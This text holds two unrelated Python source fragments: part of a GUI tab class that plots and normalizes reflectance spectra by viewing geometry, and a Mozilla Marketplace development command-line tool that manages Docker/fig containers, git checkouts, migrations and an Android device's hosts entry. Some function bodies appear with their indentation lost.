                    f"Not creating hemisphere plot for i = {incidence} (Not enough datapoints)."
                )
def plot_band_centers(self, x_axis):
    """Open a tab plotting band centers against the chosen x axis."""
    if x_axis == "e,i":
        Tab(self.plotter, "Band center", [self.contour_sample], x_axis="contour", y_axis="band center")
    elif x_axis == "az, e":
        self.plot_hemisphere_plots("band center", "Band center [nm]")
    elif x_axis in ("e", "theta", "g", "i"):
        # "i" plots come from the emission view; the rest from the incidence view.
        source = self.emission_samples if x_axis == "i" else self.incidence_samples
        Tab(self.plotter, "Band center vs " + x_axis, source, x_axis=x_axis, y_axis="band center")
def plot_band_depths(self, x_axis):
    """Open a tab plotting band depths against the chosen x axis."""
    if x_axis == "e,i":
        Tab(self.plotter, "Band depth", [self.contour_sample], x_axis="contour", y_axis="band depth")
    elif x_axis == "az, e":
        self.plot_hemisphere_plots("band depth", "Band depth")
    elif x_axis in ("e", "theta", "g", "i"):
        # "i" plots come from the emission view; the rest from the incidence view.
        source = self.emission_samples if x_axis == "i" else self.incidence_samples
        Tab(self.plotter, "Band depth vs " + x_axis, source, x_axis=x_axis, y_axis="band depth")
def plot_slopes(self, x_axis):
    """Open a tab plotting spectral slopes against the chosen x axis."""
    if x_axis in ("e,i", "i,e"):
        Tab(self.plotter, "Slope", [self.contour_sample], x_axis="contour", y_axis="slope")
    elif x_axis == "az, e":
        self.plot_hemisphere_plots("slope", "Slope")
    elif x_axis in ("e", "theta", "g", "i"):
        # "i" plots come from the emission view; the rest from the incidence view.
        source = self.emission_samples if x_axis == "i" else self.incidence_samples
        Tab(self.plotter, "Slope vs " + x_axis, source, x_axis=x_axis, y_axis="slope")
# not implemented
def calculate_photometric_variability(self, left, right):
    """Disabled: spread between min and max spectral slope per sample.

    Raises NotImplementedError immediately; the body below never runs and is
    kept only for reference.
    NOTE(review): the dead code assigns min_slope_geom in the update branch
    but reads min_slope_label when reporting — fix before re-enabling.
    """
    # pylint: disable = unreachable
    raise NotImplementedError
    left = float(left)
    right = float(right)
    photo_var = []
    for sample in self.samples:
        min_slope = None
        max_slope = None
        for i, geom in enumerate(sample.geoms):
            wavelengths = np.array(sample.data[geom]["wavelength"])
            reflectance = np.array(sample.data[geom]["reflectance"])
            index_left = (np.abs(wavelengths - left)).argmin()  # find index of wavelength
            index_right = (np.abs(wavelengths - right)).argmin()  # find index of wavelength
            slope = (reflectance[index_right] - reflectance[index_left]) / (index_right - index_left)
            if i == 0:
                min_slope = slope
                min_slope_label = geom.split("(")[1].strip(")") + " (" + str(slope) + ")"
                max_slope = slope
                max_slope_label = geom.split("(")[1].strip(")") + " (" + str(slope) + ")"
            else:
                if slope < min_slope:
                    min_slope = slope
                    # NOTE(review): min_slope_geom is never read; min_slope_label is.
                    min_slope_geom = geom.split("(")[1].strip(")") + " (" + str(slope) + ")"
                if slope > max_slope:
                    max_slope = slope
                    max_slope_label = geom.split("(")[1].strip(")") + " (" + str(slope) + ")"
        var = max_slope - min_slope
        photo_var.append(sample.name + ": " + str(var))
        photo_var.append(" min: " + min_slope_label)
        photo_var.append(" max: " + max_slope_label)
    self.plot.draw_vertical_lines([left, right])
    return photo_var
def normalize(self, wavelength):
    """Rescale every spectrum so its value at `wavelength` equals 1.

    Entirely new Sample objects replace self.samples (the originals are kept
    so the tab can be reset later), then the tab is refreshed with the y
    axis switched to "normalized reflectance".
    """
    wavelength = float(wavelength)
    rescaled = []
    for sample in self.samples:
        copy = Sample(sample.name, sample.file, sample.title)
        for geom in sample.geoms:
            wavelengths = np.array(sample.data[geom]["wavelength"])
            source_key = "reflectance" if "reflectance" in sample.data[geom] else "normalized reflectance"
            reflectance = np.array(sample.data[geom][source_key])
            # Index of the value closest to the normalization wavelength.
            anchor = (np.abs(wavelengths - wavelength)).argmin()
            multiplier = 1 / reflectance[anchor]  # normalize to 1 at the anchor
            scaled = list(reflectance * multiplier)
            copy.geoms.append(geom)
            copy.data[geom] = {"wavelength": wavelengths, "normalized reflectance": scaled}
        rescaled.append(copy)
    self.samples = rescaled
    # Keep the originals and the current x-limits, but not the y-limits,
    # since the y scale is changing.
    self.refresh(original=self.original_samples, xlim=self.xlim, y_axis="normalized reflectance")
@staticmethod
def lift_widget(widget):
widget.focus_set()
widget.lift()
def draw_labels(self):
    """Delegate label drawing to the underlying plot."""
    self.plot.draw_labels()
def get_sample(self, sample_name):
    """Look up a plotted sample by "name" or "title:name"; return None if absent."""
    if ":" in sample_name:
        parts = sample_name.split(":")
        wanted_title, wanted_name = parts[0], parts[1]
    else:
        wanted_title, wanted_name = None, sample_name
    for sample in self.samples:
        if sample.name == wanted_name and (wanted_title is None or sample.title == wanted_title):
            return sample
    return None
def set_color(self, sample_name, color):
    """Set a sample's hue, accepting either a color name or a raw hue int."""
    sample = self.get_sample(sample_name)
    if isinstance(color, int):
        hue = color  # the user entered a custom hue value
    else:
        hue = self.plot.hues[self.plot.color_names.index(color)]
    sample.set_colors(hue)
    self.update_plot()
def update_plot(self):
    """Redraw the plot and flush both figure canvases."""
    self.plot.draw()
    for fig in (self.plot.fig, self.plot.white_fig):
        fig.canvas.draw()
def set_linestyle(self, sample_name, linestyle):
    """Apply a named line style ("Solid", "Dash", "Dot", "Dot-dash") to a sample."""
    style_codes = {"Solid": "-", "Dash": "--", "Dot": ":", "Dot-dash": "-."}
    self.get_sample(sample_name).set_linestyle(style_codes[linestyle])
    self.update_plot()
def set_markerstyle(self, sample_name, markerstyle):
    """Apply a named marker style ("Circle", "X", "Diamond", "Triangle") to a sample."""
    marker_codes = {"Circle": "o", "X": "x", "Diamond": "D", "Triangle": "^"}
    self.get_sample(sample_name).set_markerstyle(marker_codes[markerstyle])
    self.update_plot()
def set_legend_style(self, legend_style):
self.plot.draw_legend(legend_style)
# self.refresh(original=self.original_samples, xlim=self.xlim, ylim=self.ylim, y_axis=self.y_axis)
def set_title(self, title, init=False):
    """Assign a unique tab title, appending " (n)" on collisions.

    When *init* is False the tab's previous title is retired first and
    the plot's own title is refreshed as well.
    """
    if not init:
        self.plotter.titles.remove(self.notebook_title)
    requested = title
    suffix = 1
    while title in self.plotter.titles:
        title = "{0} ({1})".format(requested, suffix)
        suffix += 1
    self.notebook_title = title
    self.plotter.titles.append(title)
    if not init:
        self.plot.set_title(title)
    self.plotter.notebook.tab(self.top, text=title + " x")
def reset(self):
    """Restore the originally plotted samples and replot."""
    # NOTE(review): this rebinds rather than copies, so later edits touch
    # the original sample objects too — confirm that is intended.
    self.samples = self.original_samples
    self.exclude_artifacts = False
    self.refresh()

def close_right_click_menu(self, event):
    """Dismiss the context menu (Tk callback; *event* is unused)."""
    # pylint: disable = unused-argument
    self.popup_menu.unpost()

def open_analysis_tools(self):
    """Open the analysis-tools dialog for this tab's samples."""
    # Build up lists of strings telling available samples, which of those samples a currently plotted,
    # and a dictionary mapping those strings to the sample options.
    self.build_sample_lists()
    self.plotter.controller.open_analysis_tools(self)

def open_plot_settings(self):
    """Open the plot-settings dialog for this tab's samples."""
    self.build_sample_lists()
    self.plotter.controller.open_plot_settings(self)
def build_sample_lists(self):
    """Rebuild the listbox label structures for the sample picker.

    Fills self.sample_options_list (display labels), the label->sample
    mapping self.sample_options_dict, and self.existing_indices (indices
    of samples already plotted on this tab); returns the label list.
    """
    self.sample_options_dict = {}
    self.sample_options_list = []
    self.existing_indices = []
    # Each loaded file carries a dataset title; include it in the label
    # unless it is blank/whitespace.
    for index, candidate in enumerate(self.plotter.sample_objects):
        for shown in self.samples:
            if candidate.name == shown.name and candidate.file == shown.file:
                self.existing_indices.append(index)
        if candidate.title.replace(" ", "") != "":
            label = candidate.title + ": " + candidate.name
        else:
            label = candidate.name
        self.sample_options_dict[label] = candidate
        self.sample_options_list.append(label)
    return self.sample_options_list
# We want to pass a list of existing samples and a list of possible samples.
def ask_which_samples(self):
    """Open the sample-picker dialog, pre-highlighting plotted samples."""
    # Build up lists of strings telling available samples, which of those samples a currently plotted, and
    # a dictionary mapping those strings to the sample options.
    self.build_sample_lists()
    # We tell the controller which samples are already plotted so it can initiate the listbox with those
    # samples highlighted.
    self.plotter.controller.ask_plot_samples(
        self, self.existing_indices, self.sample_options_list, self.geoms, self.notebook_title
    )
def set_samples(
    self, listbox_labels, title, incidences, emissions, azimuths, exclude_specular=False, tolerance=None
):
    """Replace this tab's samples with the user's listbox selection and replot.

    listbox_labels: labels picked in the dialog; they key into
        self.sample_options_dict built by build_sample_lists().
    title: new tab title; if empty, a comma-joined label list is used.
    incidences / emissions / azimuths: geometry filters; empty lists mean
        "plot all" (see check_geom).
    exclude_specular / tolerance: drop near-specular geometries within
        *tolerance* degrees; an unparsable or missing tolerance falls
        back to 0.
    """
    self.samples = []
    if title == "":
        title = ", ".join(listbox_labels)
    for label in listbox_labels:
        self.samples.append(self.sample_options_dict[label])
    self.geoms = {"i": incidences, "e": emissions, "az": azimuths}
    self.exclude_specular = exclude_specular
    if self.exclude_specular:
        try:
            self.specularity_tolerance = int(tolerance)
        # int(None) raises TypeError, not ValueError — catch both so a
        # missing tolerance degrades to 0 instead of crashing.
        except (TypeError, ValueError):
            self.specularity_tolerance = 0
    # NOTE(review): when exclude_specular is False this method still reads
    # self.specularity_tolerance below — presumably __init__ seeds it;
    # confirm.
    winnowed_samples = (
        []
    )  # These will only have the data we are actually going to plot, which will only be from the
    # specified geometries.
    for sample in self.samples:  # (the old enumerate() index was unused)
        winnowed_sample = Sample(sample.name, sample.file, sample.title)
        for geom in sample.geoms:  # For every spectrum associated with the sample,
            # check if it is for a geometry we are going to plot.
            # if it is, attach that spectrum to the winnowed sample data
            try:  # If there is no geometry information for this sample, this will throw an exception.
                i, e, az = utils.get_i_e_az(geom)
                if self.check_geom(
                    i, e, az, exclude_specular, self.specularity_tolerance
                ):  # If this is a geometry we are supposed to plot
                    winnowed_sample.add_spectrum(
                        geom, sample.data[geom]["reflectance"], sample.data[geom]["wavelength"]
                    )
            except (IndexError, KeyError):  # If there's no geometry information, plot the sample.
                print("plotting spectrum with invalid geometry information")
                winnowed_sample.add_spectrum(
                    geom, sample.data[geom]["reflectance"], sample.data[geom]["wavelength"]
                )
        winnowed_samples.append(winnowed_sample)
    self.samples = winnowed_samples
    self.set_title(title)
    self.refresh()
def refresh(
    self, original=None, xlim=None, ylim=None, x_axis="wavelength", y_axis="reflectance"
):  # Gets called when data is updated, either from edit plot or analysis tools. We set original = False if
    # calling from normalize, that way we will still hold on to the unchanged data.
    """Rebuild the whole tab in place after its data changed.

    Axis limits are forwarded so zoom state survives the rebuild;
    *original* carries the unmodified samples when called from normalize.
    """
    # Recreate the tab at the same notebook position by tearing the old
    # one down and re-running __init__ with the current state.
    tab_index = self.plotter.notebook.index(self.plotter.notebook.select())
    self.plotter.titles.remove(self.notebook_title)
    self.plotter.notebook.forget(self.plotter.notebook.select())
    self.__init__(
        self.plotter,
        self.notebook_title,
        self.samples,
        tab_index=tab_index,
        geoms=self.geoms,
        original=original,
        xlim=xlim,
        ylim=ylim,
        x_axis=x_axis,
        y_axis=y_axis,
        exclude_artifacts=self.exclude_artifacts,
        exclude_specular=self.exclude_specular,
        specularity_tolerance=self.specularity_tolerance,
    )
def open_right_click_menu(self, event):
    """Show the context menu just beside the cursor position."""
    self.popup_menu.post(event.x_root + 10, event.y_root + 1)
    self.popup_menu.grab_release()

def close(self):
    """Remove this tab from the notebook and retire its title."""
    tabid = self.plotter.notebook.select()
    self.plotter.notebook.forget(tabid)
    self.plotter.titles.remove(self.notebook_title)
def check_geom(self, i, e, az, exclude_specular=False, tolerance=None):
    """Return True when (i, e, az) is one of the geometries to plot.

    Empty lists in self.geoms act as wildcards. With *exclude_specular*,
    geometries where |i + e| <= tolerance are rejected (specular
    configurations have e == -i).
    """
    # Values may arrive as strings like "0.0"; int("0.0") raises, so go
    # through float first.
    i = int(float(i))
    e = int(float(e))
    if az is not None:
        az = int(float(az))
    if exclude_specular and np.abs(i + e) <= tolerance:
        return False
    i_ok = i in self.geoms["i"] or self.geoms["i"] == []
    e_ok = e in self.geoms["e"] or self.geoms["e"] == []
    az_ok = az in self.geoms["az"] or self.geoms["az"] == []
    return i_ok and e_ok and az_ok
def adjust_x(self, left: float, right: float):
    """Set and remember the x-axis limits."""
    self.xlim = [left, right]
    self.plot.adjust_x(left, right)

def adjust_y(self, bottom: float, top: float):
    """Set and remember the y-axis limits."""
    self.ylim = [bottom, top]
    self.plot.adjust_y(bottom, top)

def adjust_z(self, low: float, high: float):  # only gets called for contour plot
    """Set and remember the z (color scale) limits; contour plots only."""
    self.zlim = [low, high]
    self.plot.adjust_z(low, high)
|
<filename>mkt/cmds.py
import argparse
import ConfigParser as configparser
import functools
import os
import re
import sha
import shutil
import socket
import subprocess
import sys
import tempfile
import textwrap
from collections import namedtuple
from contextlib import contextmanager
from decimal import Decimal
from pprint import pprint
import netifaces
import requests
from fig.cli import main
from version import __version__
ROOT = os.path.dirname(os.path.abspath(__file__))
join = functools.partial(os.path.join, ROOT)
CONFIG_PATH = os.path.expanduser('~/.wharfie')
FIG_PATH = os.getenv('FIG_FILE', os.path.expanduser('~/.mkt.fig.yml'))
BRANCHES = [
'fireplace',
'solitude',
'spartacus',
'webpay',
'zamboni',
'zippy',
'signing-service'
]
FIG_ALIASES = {
'signing-service': 'signing'
}
IMAGES = [
'elasticsearch',
'memcached',
'mysql-data',
'mysql-service',
'nginx',
'redis'
]
# Mapping of the branch to [file in container, file locally].
req = namedtuple('Requirement', ['container', 'local'])
pip = req('/pip/requirements/prod.txt', 'requirements/prod.txt')
# Node-style projects track bower/package manifests instead of pip files.
js = lambda x, y: req('/srv/{0}/{1}.json'.format(x, y), '{0}.json'.format(y))
REQUIREMENTS = {
    'zamboni': [pip],
    'solitude': [pip],
    'webpay': [pip],
    'fireplace': [js('fireplace', 'bower'), js('fireplace', 'package')],
    'spartacus': [js('spartacus', 'package')],
    'zippy': [js('zippy', 'package')],
}
# Projects that need `schematic` database migrations after an update.
MIGRATIONS = ['zamboni', 'solitude']
# Status endpoints polled by `mkt check --services`.
SERVICE_CHECKS = {
    'solitude': 'http://mp.dev/solitude/services/status/',
    'webpay': 'http://mp.dev/mozpay/services/monitor',
    'zamboni': 'http://mp.dev/services/monitor.json'
}
# Command functions:
def check_git_config(args, parser):
for branch in BRANCHES:
branch_dir = join(locations()['tree'], branch)
with pushd(branch_dir):
os.chdir(branch_dir)
print "[{0}]".format(branch)
indent("[remotes]")
indent(subprocess.check_output(['git', 'remote', '-v']), 2)
indent("[Master branch origin]")
origin = subprocess.check_output(['git', 'config', '--get',
'branch.master.remote'])
indent(origin, 2)
print
def revs(args, parser):
for branch in BRANCHES:
branch_dir = join(locations()['tree'], branch)
with pushd(branch_dir):
os.chdir(branch_dir)
active_branch = subprocess.check_output([
'git', 'rev-parse', '--abbrev-ref', 'HEAD'])
rev = subprocess.check_output([
'git', 'log', '-n', '1',
'--pretty=oneline', '--abbrev-commit'])
print "{0}: {1} [{2}]".format(branch, rev.split()[0],
active_branch.rstrip())
def checkout(args, parser, gh_username=None):
    """Clone any missing marketplace branches and wire up their remotes.

    The mozilla repo is registered as args.moz_remote_name (default
    "upstream") and the user's fork as args.fork_remote_name (default
    "origin"). Requires a root path (see root) and a github username
    (see whoami).
    """
    if not locations()['tree']:
        parser.error('Please set a location by calling root first.')
    if not gh_username:
        gh_username = whoami(quiet=True)
    if not gh_username:
        parser.error('Please set a github username with the "whoami" '
                     'command first')
    for branch in BRANCHES:
        branch_dir = join(locations()['tree'], branch)
        if not os.path.isdir(branch_dir):
            subprocess.call([
                'git', 'clone', '-o', args.moz_remote_name,
                'https://github.com/mozilla/{0}.git'.format(branch),
                branch_dir
            ])
            subprocess.call([
                'git', 'remote', 'add', args.fork_remote_name,
                'https://github.com/{0}/{1}.git'.format(gh_username, branch)
            ], cwd=branch_dir)
            # BUG FIX: this call previously had no cwd, so the config was
            # written to whatever repo the user happened to be standing in
            # instead of the freshly cloned branch.
            subprocess.call([
                'git', 'config', 'branch.master.remote', args.moz_remote_name
            ], cwd=branch_dir)
def whoami(args=None, parser=None, quiet=False):
    """Show, set, or fetch the stored github username.

    Precedence: MKT_GITHUB_USERNAME env var, then the saved config value,
    then an explicit args.github_username. Whatever is resolved gets
    persisted. Returns the username or None. *parser* is unused but kept
    for the sub-command calling convention func(args, parser).
    """
    user = os.environ.get('MKT_GITHUB_USERNAME', None)
    if not user:
        user = get_config_value('github', 'user')
    if args and args.github_username:
        user = args.github_username
    if user:
        # Persist the resolved name so later invocations find it.
        set_config_value('github', 'user', user)
    if not quiet:
        if user:
            print('github user: {0}'.format(user))
        else:
            print('Try setting your github username with '
                  '"mkt whoami [github_username]"')
    return user
def locations():
    """Return the key filesystem paths the tool works with."""
    return {
        # Where the checked out projects live.
        'tree': get_config_value('paths', 'root'),
        # Where the images live, will be local or in the installed path.
        'image': join('data', 'images'),
        # Where fig config lives, will be local or in the installed file path.
        'fig.dist': join('data', 'fig.yml.dist'),
        # FIG_FILE is the file that fig uses.
        'fig': FIG_PATH
    }

def root(args, parser):
    """Show or set the marketplace root directory and/or build source.

    With no arguments just prints the saved root; setting either value
    regenerates the fig file.
    """
    if not args.directory and not args.build:
        value = get_config_value('paths', 'root')
        if value:
            print value
        return
    if args.directory:
        directory = os.path.abspath(os.path.expandvars(args.directory))
        if not os.path.exists(directory):
            raise ValueError('Directory {0} does not exist.'.format(directory))
        set_config_value('paths', 'root', directory)
    if args.build:
        set_config_value('source', 'build', args.build)
    update_config(args, parser)
def update_config(args, parser):
context = locations()
build_type = get_config_value('source', 'build', 'local')
for name in BRANCHES + IMAGES:
# If its build locally, write out a local build command.
if build_type == 'local':
value = 'build: {image}/{name}'
# The build command is different if its a branch because the
# path is different.
if name in BRANCHES:
value = 'build: {tree}/{name}'
value = value.format(name=name, **context)
# Just pull from docker hub.
elif build_type == 'hub':
value = 'image: mozillamarketplace/{name}'.format(name=name)
# Wat?
else:
raise ValueError('Unknown build type: {0}. '
'Valid values: hub or local'.format(build_type))
context['build-{0}'.format(name)] = value
src_file = context['fig.dist']
with open(src_file, 'r') as src:
src_data = src.read()
dest_file = context['fig']
new_data = src_data.format(**context)
if os.path.exists(dest_file):
# If the old file is the same as the new file, then there
# is no need to add anything new.
old_data = open(dest_file, 'r').read()
if old_data == new_data:
return
with open(dest_file, 'w') as dest:
dest.write(new_data)
print 'Written fig file to {0}'.format(FIG_PATH)
def up(args, parser, argv):
    """Regenerate fig.yml then run `fig up -d --no-recreate`.

    Extra CLI arguments (*argv*) are passed straight through to fig.
    """
    update_config(args, parser)
    cmd = ['up', '-d', '--no-recreate'] + argv
    fig_command(*cmd)
# Flag telling the dispatcher that this command wants the raw argv tail.
up.argv = True

def bash(args, parser):
    """Open an interactive bash shell inside a running container."""
    project = get_project(args.project)
    cmd = ('docker exec -t -i {0} /bin/bash'
           .format(get_fig_container(project).id))
    os.system(cmd)
    return
def get_version(method):
    """Return the version number(s) reported by a tool as Decimals.

    *method* is 'docker', 'boot2docker' or 'fig'. The tool's version
    command is run and its output matched against a regex; docker yields
    two values (client and server), the others one.

    Raises ValueError when the command is missing or unrecognised.
    """
    methods = {
        'docker': [
            # Raw strings so the \d escapes are explicit regex syntax.
            r'Client version: (\d.\d).*?Server version: (\d.\d)',
            ['docker', 'version']
        ],
        'boot2docker': [
            r'^Boot2Docker-cli version: v(\d.\d)',
            ['boot2docker', 'version']
        ],
        'fig': [r'^fig (\d.\d)', ['fig', '--version']]
    }
    regex, command = methods[method]
    try:
        result = subprocess.check_output(command).strip()
    except OSError:
        raise ValueError('Command: "{0}" failed, is it installed?'
                         .format(' '.join(command)))
    try:
        res = re.findall(regex, result, flags=re.S)
        if isinstance(res[0], tuple):
            # docker matches two groups; flatten the single tuple result.
            res = res[0]
    except IndexError:
        raise ValueError('Command: "{0}" returned an unknown value.'
                         .format(' '.join(command)))
    return [Decimal(v) for v in res]
def check(args, parser):
    """Run basic health checks: env vars and paths, plus (optionally)
    service status pages, tool versions, and container requirements."""
    context = locations()
    default = os.getenv('FIG_FILE')
    diffs = []
    if context['fig'] != default:
        diffs.append('FIG_FILE={0}'.format(FIG_PATH))
    # NOTE(review): this second `default` assignment is never read —
    # looks vestigial.
    default = os.getenv('FIG_PROJECT_NAME')
    if 'mkt' != os.getenv('FIG_PROJECT_NAME'):
        diffs.append('FIG_PROJECT_NAME=mkt')
    if diffs:
        print 'Set the following environment variables: '
        for d in diffs:
            print d
        print
    # The checked-out tree and the image directory must both exist.
    for path in ['tree', 'image']:
        if not os.path.exists(context[path]):
            print 'Directory {0} does not exist.'.format(context[path])
    for branch in BRANCHES:
        branch_dir = join(context['tree'], branch)
        if not os.path.exists(branch_dir):
            print ('Directory {0} does not exist, run checkout.'
                   .format(branch_dir))
    if args.services:
        # Hit each service's status page through the nginx proxy.
        for service, url in SERVICE_CHECKS.items():
            try:
                res = requests.get(url, timeout=5)
            except (requests.exceptions.Timeout,
                    requests.exceptions.ConnectionError):
                # nginx isn't even up.
                print 'Error on: {0}, is it running?'.format(service)
                continue
            if res.status_code == 502:
                # nginx proxy errors.
                print 'Service not up: {0} (proxy error)'.format(service)
            if res.status_code == 500:
                print 'Status failed on: {0}.'.format(service)
                print
                pprint(res.json())
                print
    if args.versions:
        dockers = get_version('docker')
        for version in dockers:
            if version < Decimal('1.3'):
                print ('Update docker, client or server version 1.3 or higher '
                       'is recommended. Run: docker version')
        if get_version('boot2docker')[0] < Decimal('1.3'):
            print 'Update boot2docker, version 1.3 or higher recommended.'
        if get_version('fig')[0] < Decimal('1.0'):
            print 'Update fig, version 1.0 or higher recommended.'
    if args.requirements:
        # Compare requirement-file hashes inside the container vs on disk.
        for branch in BRANCHES:
            files = REQUIREMENTS.get(branch)
            if not files:
                continue
            container = get_container_requirements(branch, files)
            local = get_local_requirements(branch, files)
            if local != container:
                print ('Requirements on container differ from local, '
                       'rebuild recommended for: {0}'.format(branch))
def update(args, parser):
git, migration = args.git, args.migrations
if not git and not migration:
# If the user didn't pass a flag, run both.
git, migration = True, True
if git:
for branch in BRANCHES:
branch_dir = join(locations()['tree'], branch)
with pushd(branch_dir):
try:
print 'Updating git for: {0}'.format(branch)
indent(subprocess.check_output(['git', 'pull', '-q']), 2)
except subprocess.CalledProcessError:
print
print 'Failed to update: {0}'.format(branch_dir)
print
raise
if migration:
for migration in MIGRATIONS:
print 'Running migration for: {0}'.format(migration)
fig_command('run', '--rm', migration,
'schematic', 'migrations')
def bind(args, parser):
    """Bind args.bind_host to a public IP in a connected device's hosts file.

    With --interfaces, just list candidate interfaces/IPs and exit.
    Without --bind_ip the IP is guessed from the network interfaces
    (prompting if several are usable). Exactly one adb device must be
    attached; its /system/etc/hosts is pulled, rewritten, and pushed back.
    """
    if args.interfaces:
        for interface, ip_addr in get_interface_data():
            print('{ip} ({int})'.format(ip=ip_addr, int=interface))
        return
    if not args.bind_ip:
        # Guess the IP.
        interfaces = get_interface_data(args.bind_int)
        if not interfaces:
            # BUG FIX: this called args.error(), but argparse.Namespace has
            # no error() method; parser.error() is the intended call.
            parser.error('No useable interfaces found. Are you connected '
                         'to a network that your device will be able to "see"?')
        if len(interfaces) > 1:
            prompt = 'Not sure which IP to use. Please select one [1]:'
            interface_ips = get_interface_data()
            choices = []
            for interface, ip_addr in interface_ips:
                choices.append(('{ip} ({int})'.format(ip=ip_addr,
                                                      int=interface), ip_addr))
            choice = select(choices, prompt=prompt)
            args.bind_ip = choice[1]
        else:
            # Get the only IP we found.
            args.bind_ip = interfaces[0][1]
    devices = get_adb_devices()
    if len(devices) > 1:
        raise NotImplementedError(
            'adb says more than one device is connected. Updating the '
            'right one is not implemented yet.')
    elif len(devices) == 0:
        parser.error('Could not find any attached devices with adb. '
                     'Is your device connected?')
    print('About to bind host "{host}" on device to IP "{ip}"'
          .format(host=args.bind_host, ip=args.bind_ip))
    td = tempfile.mkdtemp()
    try:
        with pushd(td):
            subprocess.check_call(['adb', 'remount'])
            subprocess.check_call(['adb', 'pull', '/system/etc/hosts', './'])
            with open('./hosts') as f:
                lines = f.readlines()
            newlines = []
            for ln in lines:
                if (ln.strip().endswith(args.bind_host) or
                        ln.startswith('# Docker:')):
                    # Remove the old IP binding and comments.
                    continue
                newlines.append(ln)
            newlines.append(
                '# Docker: marketplace-env `mkt bind` added this:\n')
            newlines.append('{ip}\t\t {host}\n'
                            .format(ip=args.bind_ip, host=args.bind_host))
            with open('./new-hosts', 'w') as f:
                f.write(''.join(newlines))
            subprocess.check_call(['adb', 'push', './new-hosts',
                                   '/system/etc/hosts'])
    finally:
        # Always clean up the scratch directory, even on adb failure.
        shutil.rmtree(td)
# Helper functions:
def get_container_requirements(branch, files):
    """sha1 of the concatenated requirement files inside the container."""
    project = get_project(branch)
    files_str = ' '.join([f.container for f in files])
    cmd = ('docker exec -t -i {0} /bin/bash -c "cat {1} | sha1sum"'
           .format(get_fig_container(project).id, files_str))
    try:
        container = subprocess.check_output(cmd, shell=True)
    except subprocess.CalledProcessError:
        print 'Failed to check: {0}'.format(branch)
        raise
    # If we could suppress the ' -' on the output of sha1sum, we
    # could remove this.
    return container.split(' ')[0]

def get_local_requirements(branch, files):
    """sha1 of the same requirement files in the local checkout, for
    comparison against get_container_requirements()."""
    branch_dir = join(locations()['tree'], branch)
    local = sha.new()  # Python 2 `sha` module; equivalent to hashlib.sha1()
    for name in files:
        with open(os.path.join(branch_dir, name.local)) as handle:
            local.update(handle.read())
    return local.hexdigest()
def get_project(project):
    """Resolve a project name, defaulting to the repo containing the cwd.

    When *project* is falsy, walks up from the current directory until a
    Dockerfile is found and uses that directory's basename. Raises
    ValueError when nothing is found or the name is not a known
    branch/image.
    """
    cur = os.getcwd()

    def walk(directory):
        # A Dockerfile marks the root of a project checkout.
        if 'Dockerfile' in os.listdir(directory):
            return os.path.basename(directory)
        new = os.path.dirname(directory)
        if new == directory:
            # Reached the filesystem root without finding a Dockerfile.
            raise ValueError('No project found.')
        return walk(new)

    project = project or walk(cur)
    if project not in BRANCHES and project not in IMAGES:
        raise ValueError('Project {0} not in BRANCHES or IMAGES'
                         .format(project))
    return project
def get_fig_container(project):
    """Return the (first) running fig container for *project*.

    Raises ValueError when nothing is up for that service.
    """
    cmd = main.Command()
    proj = cmd.get_project(FIG_PATH)
    # Some services are published under a different fig service name.
    project = FIG_ALIASES.get(project, project)
    containers = proj.containers(service_names=[project])
    if not containers:
        raise ValueError('No containers found for: {0}. '
                         'Run: mkt up' .format(project))
    return containers[0]

def fig_command(*args):
    """Dispatch a fig CLI command, tolerating a zero exit code."""
    cmd = main.TopLevelCommand()
    try:
        cmd.dispatch(args, None)
    except SystemExit as exit:
        # fig exits via SystemExit even on success; only re-raise failures.
        if exit.code != 0:
            raise
def get_config_value(section, key, default=None):
    """Read a value from the ~/.wharfie config, or *default* when absent."""
    config = configparser.ConfigParser()
    config.read(CONFIG_PATH)
    try:
        return config.get(section, key)
    except (configparser.NoSectionError, configparser.NoOptionError):
        pass
    return default

def set_config_value(section, key, value):
    """Write a value to the ~/.wharfie config, creating the section if needed."""
    config = configparser.ConfigParser()
    config.read(CONFIG_PATH)
    try:
        config.add_section(section)
    except configparser.DuplicateSectionError:
        pass
    config.set(section, key, value)
    print('Saving {0} to {1}'.format(key, CONFIG_PATH))
    with open(CONFIG_PATH, 'w') as configfile:
        config.write(configfile)
def indent(text, times=1):
    """Print *text* indented by *times* spaces, wrapped at 90 columns."""
    wrapper = textwrap.TextWrapper(
        initial_indent=' '*times, width=90, subsequent_indent=' '*times
    )
    for line in text.splitlines():
        print wrapper.fill(line)
@contextmanager
def pushd(newdir):
    """Temporarily chdir into *newdir*; restore the previous cwd on exit."""
    previous = os.getcwd()
    try:
        os.chdir(newdir)
        yield
    finally:
        os.chdir(previous)
def get_adb_devices():
    """Return the non-header lines of `adb devices` (one per device)."""
    devices = subprocess.check_output(['adb', 'devices']).strip().splitlines()
    devices.pop(0)  # remove the header
    return devices

def get_image(args, parser):
    """Resolve an image name to its directory under the images root."""
    image_name = args.name
    image_dir = join(locations()['image'], image_name)
    # NOTE(review): os.path.isdir already implies existence, so the extra
    # os.path.exists check is redundant (but harmless).
    if not os.path.isdir(image_dir) or not os.path.exists(image_dir):
        parser.error('image_dir: {0} does not exist. '
                     'Exiting'.format(image_dir))
    return {
        'name': image_name,
        'dir': image_dir,
    }
def select(choices, default=1, prompt='Please choose from the following [1]:'):
    """Create a prompt similar to select in bash.

    *choices* is a list of (label, value) tuples; returns the chosen
    tuple. Re-prompts (recursively) on invalid input; Ctrl-C exits.
    """
    invalid_choice = 'Not a valid choice. Try again.'
    for i, value in enumerate(choices):
        print('{num}) {val}'.format(num=i + 1, val=value[0]))

    def get_choice():
        try:
            val = raw_input(prompt)  # Python 2 input primitive
            if val == '':
                val = default
            val = int(val) - 1  # displayed numbers are 1-based
        except ValueError:
            print(invalid_choice)
            return get_choice()
        except KeyboardInterrupt:
            print('')
            print('caught KeyboardInterrupt')
            sys.exit(1)
        try:
            return choices[val]
        except IndexError:
            print(invalid_choice)
            return get_choice()

    return get_choice()
def get_ips_for_interface(interface):
    """Get the ips for a specific interface.

    Returns a list of (interface, ip) tuples for IPv4 addresses,
    skipping loopback. Raises ValueError for an unknown interface name.
    """
    interface_ips = []
    try:
        for fam, data in netifaces.ifaddresses(interface).items():
            if fam == socket.AF_INET:  # IPv4 only
                for d in data:
                    ip = d.get('addr')
                    if ip and not ip.startswith('127'):
                        interface_ips.append((interface, ip))
        return interface_ips
    except ValueError, exc:  # Python 2 except syntax
        raise ValueError('You provided "{int}". Choose one of: {opt}; '
                         'ValueError: {err}'
                         .format(opt=', '.join(netifaces.interfaces()),
                                 int=interface, err=exc))

def get_interface_data(interface=None):
    """
    Get interface data for one or more interfaces.

